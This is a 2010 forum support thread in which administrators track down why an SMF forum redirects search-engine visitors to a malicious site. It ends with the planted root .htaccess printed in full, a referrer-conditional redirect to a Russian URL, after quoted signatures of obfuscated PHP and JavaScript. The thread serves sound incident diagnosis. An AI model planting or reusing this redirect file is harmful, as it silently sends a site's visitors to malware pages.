News:

SMF 2.1.4 has been released! Take it for a spin! Read more.

Main Menu

Help with hacked site 2.0 RC3

Started by TeeJay, August 06, 2010, 04:13:31 PM

Previous topic - Next topic

TeeJay

I helped set a site up for some friends at www.lfr-wales.co.uk
I've noticed that if accessed by the above URL all seems fine but Google search results point to (CAREFUL WITH THIS FOLLWING LINK, IT RE-DIRECTS) www.lfr-wales.co.uk/index.php

Accessing via the second url results in a redirect to a dodgy site which contains threats

I need to find where this has been compromised and fix it as fast as possible


Any help guys ?

I really need it

Thanks

Stuck CAPS

Go into CPanel, or whatever you use to manage your site, go into wherever the redirects are, and delete the redirect to the page it shouldn't go to.
My website: iCAPS


TeeJay

Thanks but how do I know where the redirects are ?

I assumed it would be in one of the .php files or in the db ?

kat

I don't get redirected.

I'm on your site, Legal Forest Riders, as I type.

I'm on the forum, too, with no hassles.

Opera 10.60.

Both links.

xenovanis

Try index.php (in your forum root) first and compare it with the index.php from the installationpackage for 2.0 RC3.

Also, in the file .htaccess, do you see any oddities?
"Insanity: doing the same thing over and over again and expecting different results."

kat

As I don't get redirected, maybe your browser's been compromised.

Can you try another?

TeeJay

Thanks for the quick responses guys

Now this is getting very strange

I doubt it's my browser as the problem was reported to me by someone else (who I have no connection with)
I checked it for myself and got the same result

WARNING! before following the step below make sure you have your page and virus scanners running...

Do a UK search in Google for "Legal Forest Riders", find the link to the lfr website as above and click it

Changed the index.php file to the original one (before ezportal install) then swapped it back again to the suspect version and the url www.lfr-wales.co.uk/index.php no longer re-directs but the Google link does

TeeJay

Quote from: K@ on August 06, 2010, 04:50:39 PM
I don't get redirected.

I'm on your site, Legal Forest Riders, as I type.

I'm on the forum, too, with no hassles.

Opera 10.60.

Both links.

It only happens if you follow the search result in Google

TeeJay

Quote from: K@ on August 06, 2010, 04:53:45 PM
As I don't get redirected, maybe your browser's been compromised.

Can you try another?

Yes
It happens in Both Internet Explorer and Firefox

xenovanis

I've had something similar. You should report this to Google.
"Insanity: doing the same thing over and over again and expecting different results."

TeeJay

Quote from: xenovanis on August 06, 2010, 04:52:01 PM
Try index.php (in your forum root) first and compare it with the index.php from the installationpackage for 2.0 RC3.

Also, in the file .htaccess, do you see any oddities?

Thanks
I couldn't see anything in the file and don't have a .htaccess file

Weird how after swapping out the file for the orginal and then swapping back again it doesn't happen if accessed directly but still does in the Google results link ?

kat


TeeJay

Quote from: xenovanis on August 06, 2010, 05:05:44 PM
I've had something similar. You should report this to Google.

It really is odd
I'm reluctant to report it to Google until I can verify that it has nothing to do with the LFR site for fear of Google dropping it out of their searches

xenovanis

It's been a while now, I can't quite recall what it exactly was and what I did. Early dementia, I suppose  ::)

Lemme search and think some more for you before you report it. I'll get back on this.
"Insanity: doing the same thing over and over again and expecting different results."

TeeJay

Many thanks folks

Yeah
Google hacked  ;D

I reckon that'd get on the international news pretty fast


Damned weird though, still can't figure it

Three seperate people getting the same result on three seperate PC/Macs none of which share any files other than all using the same forum

Does Sherlock happen to be here somewhere ?


TeeJay

Quote from: K@ on August 06, 2010, 05:25:53 PM
It Google. No question.

The only thing to do is contact them.

Gawd knows how, though.

Maybe here?

Sorry, I thought you was joking  :-[
Can that really happen ?

kat

Not only has it happened, they also got a virus, a while back. As, indeed, did Microsoft.

Just tell them what's happening. That might not be the right place, but you've got to start somewhere.

Your link's fine, so how could it not be them?

Give them a shout. Nothing to lose, ay?

PS. If you want me to check through your files, just in case, PM me some FTP details and I'll get on it, in the morning.

Please, read this, first:

http://www.simplemachines.org/community/index.php?topic=228940.0

xenovanis

"Insanity: doing the same thing over and over again and expecting different results."

busterone

Further confirmation. I was not redirected using your link with FF, IE8, nor with Opera. It looks to be Google.

TeeJay

Yep, I think you guys are right

I tried from my laptop and the link is OK but the Google search re-directs

Thanks for the offer K@

I'll have to speak to the site owners to get their consent so I'll get back to you on it

kat

No problem!

I have a wedding, today, as Paul and Pauline are getting hitched. http://www.simplemachines.org/community/index.php?topic=394626.0;topicseen

So, it might be tomorrow, now. :)

TeeJay

Thanks again for all the input

Is it possible that there is a "conditional redirect" which redirect if the refferer is a search engine, maybe javascript somehere in the files (I don't have an htacces file) ?

If so, where might I start to look ?

TeeJay

Update

I no longer beleive it is Google at fault....

It appears as though there may well be a condition redirect in the scripts somewhere (hopefully K@ can find it)

See here for Google info on the redirects
http://www.google.com/support/forum/p/Webmasters/thread?tid=33d2b7c117f84168&hl=en&search_impression_id=2cc34e43dcfe09d7%3A12a5605b571&search_source=related_question

Also by using a site checking service http://www.unmaskparasites.com , I've discovered that there does appear to be a re-direct in place to a Russian website which then redirect to alternating malicious pages

Take a look at http://www.unmaskparasites.com and type the url www.lfr-wales.co.uk into the site to be checked and see the results

So having discovered this can anyone help me find the hacked file ?

kat

Found some nasties in ezportal's javascript files.

I'm clearing those out and then I'm gonna dig deeper.

kat

Nope. I can't find anything else and I've been looking for over an hour. :(

In your ezportal directory, there's a file named "jquery-1.2.6.pack0.js".

Take a look at the last line.

I cleaned that out and you'll see the difference between that and "jquery-1.2.6.pack.js", which is the cleaned one.

Look at the difference in the filesizes, too!

Now, if that was my forum, this is what I'd do.

BACKUP FIRST!!

I'd get the full SMF install package and upload all the files, from there, to your site, overwriting what's there, now.

NOT Settings.php or install.php.

That will, without a doubt, screw all of your mods. :(

They'll still be in your Packages directory, though, so you'll just need to reinstall them. :)

Plus, of course, you might need to redo your portal blocks.

TeeJay

Many many many thanks K@

Would you help me by teeling me how you tracked that down as I'd been opening files forever and couldn't see anything (only if it's not too much time for you)


Also, would you have any clues as to how the file became corrupted ?

Thanks

kat

Pure luck, for the most part.

That link you posted said to check javascript files and .htaccess files, which is what I started-out with.

When checking the files, I looked for an unfeasibly long line, such as that one.

How did you cop it?

Well, now. That's the question, ain' it?

I really don't have a clue, to be honest.

I'll give the dev team a wave, in case there's an exploit that they could've used.

RC3 is only a Release Candidate, after all.

That's why it's not recommended for "live" sites.

TeeJay

Thanks K@

Query....

You said you had taken the code out of the infected files and renamed them yet I cannot see the new or old files in the ezportal directory ?
I can see them in the backup on my local PC

I have another SMF site at www.vdsr.co.uk which has those exact same files in the ezportal directory with the same contents (letter for letter) yet VDSR doesn't get redirected via the Google link

Are you certain that code was malicious ?

kat

That's odd...

Those files aren't there, now.

**Scratches head**

That line was exactly as described in that link you posted.

QuoteAnother common method is the use of php code or javascript.  This code is almost always obfuscated. With php the lines of code typically start out eval(base64_decode(" then a long string of characters. With Joomla check the file includes/defines.php   With javascript you see code like eval(unescape("  or   String.fromCharCode(  then long strings of character/numbers.

TeeJay

Damn
Looks like I'm going to have to pull both sites down and upload the latest files (after backing up of course)
Then re-install and configure all add-ons

At the moment I've got to guess that it isn't those files at all as they are identical to the one's on VDSR which doesn't have the same issues
Oddly though as those files don't appear to be in the downloaded ezportal mod

kat

Yeah, I noticed that, when I downloaded the portal, to compare the files.

I've given the devs a wave, in case this is an exploit, somehow.

Do you know what those files actually are?

If you didn't put them there, maybe that's where the problem was. I mean how they got in?

Maybe there's security hole in ezportal, rather than SMF.

TeeJay

No idea how the files got in there but here's a list of installed mods...

ezportal
smf classifieds
Uncensored Boards
Recount Member Posts
Global Headers Footers
Annoy User
SMF Trader System
SMF Links
Birthday Posts
Aeva Media

The modified date on the suspect files was 14th March 2010 but most of the installed mods were done long before that

kat

Thanks, for that!

Let's wait for the devs to see the message I left them.

Maybe they can figure this one out.

Tyrsson

k@ you should also point VBgamer to this thread since he is the mod author and may have some insight that could offer a jump on this. Just a thought.
PM at your own risk, some I answer, if they are interesting, some I ignore.

kat

Good finkin'.

'course, it might not be that mod, but it's sure worth checking.

Ta!

Tyrsson

I doubt its the mod or anything related to smf, most times with this type of hack its server side problems. A lot of times a admin will be hit with a keylogger and then the hacker will have ftp details, which gives them server access, a file can then be uploaded, the file can be run, the encoded code will then include outside files etc etc blah blah.... Not saying that is how this one worked, but it is the most common way.
PM at your own risk, some I answer, if they are interesting, some I ignore.

kat


vbgamer45

I don't include jquery in the latest versions of ezportal and have never used it.
If it is a packed jquery file that would be done to improve performance.
Community Suite for SMF - Take your forum to the next level built for SMF, Gallery,Store,Classifieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store SMF Classifieds Ad Seller Pro

kat

Ta, VB.

I dunno which version it was.

Were those files in earlier versions? (Just curious)

vbgamer45

Could have been but they were from jquery site themselves
Community Suite for SMF - Take your forum to the next level built for SMF, Gallery,Store,Classifieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store SMF Classifieds Ad Seller Pro

butchs

You could have a simple password you used elsewhere that was hacked or not deleted your cookies after using cpanel online?

Possibly related, for the past week or so I have been programming CloudFlare capibilities for my Bad Behavior mod for SMF 2.0 RC3.  Since crawlprotect stopped 20+ sql injection attempts, I decided to work on more protection.  While I was debugging the pesky BB source I blocked the following possible hack attempt:

IP: 173.193.219.168
DATE: 2010-08-02 00:25:45
URI: /smf/index.php?PHPSESSID=65c955b8b653327c9fa644280002323f&action=admin;area=topic_view
PROTOCOL: HTTP/1.0
HEADERS: GET /smf/index.php?PHPSESSID=65c955b8b653327c9fa644280002323f&action=admin;area=topic_view HTTP/1.0 Accept: text/html, */* Accept-Encoding: gzip Cf-Connecting-Ip: 173.193.219.168 Cf-Ipcountry: US Cf-Use-Byc: 0 Connection: close Host: www...
AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Media Center PC 5.0)
DENIED REASON: User agent claimed to be CloudFlare, claim appears false
EXPLANATION: You do not have permission to access this server.
ERROR: 403

Some luck, this guy picked the only operational "round trip DNS" check for CloudFlare on the internet to try to do something in my admin section (fyi - BB should release a new version soon which will include some of my code so others will have the same ability).  It looks like he tried to ride the cache for access.  Not sure if it is hack attempt or not or if it would have worked if it was not blocked?
I have been truly inspired by the SUGGESTIONS as I sit on my throne and contemplate the wisdom imposed upon me.

TeeJay

Quote from: vbgamer45 on August 09, 2010, 01:06:03 PM
I don't include jquery in the latest versions of ezportal and have never used it.
If it is a packed jquery file that would be done to improve performance.

Hi vbgamer, nice to see you in here (thanks for the great mods)

No idea how the jquery files have gotten in there but they aren't just in my ezportal folders, if you search the internet you'll find they're in many other smf sites too, just search for "ezportal jquery-ui-personalized-1.6rc2.min.js" or "ezportal jquery-1.2.6.pack.js"

Interestingly these files on both VDSR and LFR-Wales had similar modified dates 13th and 18th March 2010, which probably means they got in there during an upgrade ?

Both sites share the same 1and1 server, they are both using the latest SMF 2.0 RC3, they both have ezportal and both have the impulse2 theme installed, other than that I can't see any other common factors

www.lfr-wales.co.uk suffers from the re-direct whereas www.vdsr.co.uk doesn't
The redirect also happens with some email systems but not all (following the registration confirmation link)

vbgamer45

Those js files won't do anything they don't really execute code they only do it on the client and I don't believe it has anything at all to do with the hack
Community Suite for SMF - Take your forum to the next level built for SMF, Gallery,Store,Classifieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store SMF Classifieds Ad Seller Pro

TeeJay

Quote from: vbgamer45 on August 09, 2010, 01:41:41 PM
Those js files won't do anything they don't really execute code they only do it on the client and I don't believe it has anything at all to do with the hack

Yes I think you're right as K@ somehow removed the files and it's had no effect on anything

I'd like to find out for sure where the problems is and how it got there but I don't think I have the time to spare so I'll remove all files and re-upload fresh one's

Get all ftp access changed too and get the admins of LFR to run scanners on their pc's/macs before giving them the new details

TeeJay

FIXED

Wow, how worrying is this...

I use 1and1 servers, each domain is in it's own sub folder, e.g. the top domain is the root of the server and others like lrf-wales.co.uk are pointed to a folder within the root like lfr for example
The main domain path:
/homepages/46/d68340725/htdocs/

www.vdsr.co.uk
/homepages/46/d68340725/htdocs/vdsr

At some time in the past someone has managed to insert a .htaccess file in the root ( /homepages/46/d68340725/htdocs/ )

The contents of the htaccess file were

RewriteEngine On
ErrorDocument 400 http://ros-tec.ru/onlinestore/index.php
ErrorDocument 401 http://ros-tec.ru/onlinestore/index.php
ErrorDocument 403 http://ros-tec.ru/onlinestore/index.php
ErrorDocument 404 http://ros-tec.ru/onlinestore/index.php
ErrorDocument 500 http://ros-tec.ru/onlinestore/index.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://ros-tec.ru/onlinestore/index.php [R=301,L]

I have no idea how it got there, the file date was 17th Jan 2005 (I think that date is false or at least doesn't show when the file was altered
Oddly it seemed to have no effect on any of the other websites on the server of which there are around 21 ? ? ?

Damn, what a lot of work that was trying to find the culprit

Again, thank you guys so much for the help and effort, it's much appreciated

Terry

kat

AHA!

Yeah, that site you linked to stressed .htaccess files.

I checked all those that I could get at.

But, of course, I couldn't get at that one! :(

Thanks for posting what you found. That might well come in useful, if anyone else falls-foul of this crap.

Brilliant bit of detective-work, there, Terry!

Bloody well done!  :D

CapadY

Congratulations

I've marked this topic as solved. Feel free to re-open it when needed.
Please, don't PM me for support unless invited.
If you don't understand this, you will be blacklisted.

xenovanis

Nice job

Thanks for sharing your solution :)
"Insanity: doing the same thing over and over again and expecting different results."

Kill Em All

TeeJay, to help us make sure that this wasn't a SMF issue, would you mind taking the time to fill out a security report. Thanks :)
http://www.simplemachines.org/about/security.php


My Site: KEAGaming.com

Manual Installation of Mods
Prevent Spam and Forum Attacks
Please do not PM or email me for support unless offered, help should be publicly displayed to others.

Advertisement: